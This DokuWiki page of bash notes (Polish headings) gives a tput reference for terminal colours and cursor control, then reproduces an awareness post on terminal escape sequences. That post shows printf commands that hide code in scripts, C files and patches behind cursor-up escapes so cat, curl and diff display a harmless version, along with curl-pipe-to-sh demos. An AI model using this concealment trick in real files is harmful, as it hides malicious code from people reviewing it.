====== BASH i okolice ======
===== Kolorowanie tekstu w terminalu i inne tamże sztuczki =====
Here is some more detail on the awesome tput command suggested in Ignacio's answer.
==== Colour commands ====
# Set the background colour using ANSI escape
tput setab [1-7]
# Set the foreground colour using ANSI escape
tput setaf [1-7]
Colours are as follows:
Num Colour #define RGB
0 black COLOR_BLACK 0,0,0
1 red COLOR_RED max,0,0
2 green COLOR_GREEN 0,max,0
3 yellow COLOR_YELLOW max,max,0
4 blue COLOR_BLUE 0,0,max
5 magenta COLOR_MAGENTA max,0,max
6 cyan COLOR_CYAN 0,max,max
7 white COLOR_WHITE max,max,max
There are also non-ANSI versions of the colour setting functions (''setb'' instead of ''setab'', and ''setf'' instead of ''setaf'') which use different numbers, not given here.
==== Text mode commands ====
tput bold # Select bold mode
tput dim # Select dim (half-bright) mode
tput smul # Enable underline mode
tput rmul # Disable underline mode
tput rev # Turn on reverse video mode
tput smso # Enter standout (bold) mode
tput rmso # Exit standout mode
tput sgr 0 # Reset all attributes
==== Cursor movement commands ====
tput cup Y X # Move cursor to screen postion X,Y (top left is 0,0)
tput cuf N # Move N characters forward (right)
tput cub N # Move N characters back (left)
tput cuu N # Move N lines up
tput ll # Move to last line, first column (if no cup)
tput sc # Save the cursor position
tput rc # Restore the cursor position
tput lines # Output the number of lines of the terminal
tput cols # Output the number of columns of the terminal
==== Clear and insert commands ====
tput ech N # Erase N characters
tput clear # Clear screen and move the cursor to 0,0
tput el 1 # Clear to beginning of line
tput el # Clear to end of line
tput ed # Clear to end of screen
tput ich N # Insert N characters (moves rest of line forward!)
tput il N # Insert N lines
==== Other commands ====
tput bel # play a bell
With [[https://extensions.gnome.org/extension/669/wobbly-windows/|compiz wobbly windows]], the ''bel'' command makes the terminal wobble for a second to draw the user's attention.
==== Example usage ====
''echo "$(tput setaf 1)Red text $(tput setab 7)and white background$(tput sgr 0)"''
Looks like this on my Ubuntu terminal:
{{:linux:4stug.png?200|}}
Use command ''sgr 0'' to reset the colour at the end.
==== Performing multiple operations at once ====
''tput'' accepts scripts containing one command per line, which are executed in order before tput exits.
Avoid temporary files by echoing a multiline string and piping it:
echo -e "setf 7\nsetb 1" | tput -S # set fg white and bg red
==== See also ====
* See ''[[http://unixhelp.ed.ac.uk/CGI/man-cgi?tput+1|man 1 tput]]''
* See ''[[http://www.manpagez.com/man/5/terminfo/|man 5 terminfo]]'' for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)
===== Backup bashem =====
http://www.cyberciti.biz/faq/how-to-wakeup-backup-nas-server-and-mirror-files-using-rsync-in-linux/
===== Ciekawostki =====
==== Federico Bento ''Terminal escape sequences'' ====
So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled //[[http://www.openwall.com/lists/oss-security/2015/08/11/8|"Terminal escape sequences - the new XSS for admins?"]]//
This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.
How it technically works:
A terminal escape sequence is a special sequence of characters that is printed (like any other text).
If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.
While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!
As you can see, our beloved ''cat'' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence **''\033[XA''** (being ''X'' the number of times) performed some action. And this action moves the cursor up ''X'' times, overwriting what is above it ''X'' lines. But this doesn't affect only '**cat**', it affects everything that
interprets escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
It's not over yet!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
But if we pipe it into a shell...
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
You might be thinking //"If I opened that in my browser, I would detect it being malicious!"//
Well, think again...
One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.
I wouldn't even be surprised if most of those install scripts that make use of these ''pipe into sh'' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files...
It's no secret, most of us rely on ''cat'' to view files. I guess this is one black kitty, giving you bad luck.
Here's another example with a ''.c'' file
$ printf '#include \n\nint main()\n{\n\tprintf("doing
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do
much... */\n\tprintf("doing something very nice\\n");\n\treturn
0;\n}\n' > nice.c
$ cat nice.c
#include
int main()
{
/* This simple program doesnt do much... */
printf("doing something very nice\n");
return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice
''diff'' also interprets escape sequences and so do the resulting patches
Going back to the first example, imagine I have a ''backdoored.sh'' that is backdoored, and a legit.sh that does what it's output tells us.
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!
=== Hint: ===
''less'' doesn't interpret escape sequences unless the ''-r'' switch is used, so stop aliasing it to ''less -r'' just because there's no colored output.
s/party/hack like it's 1999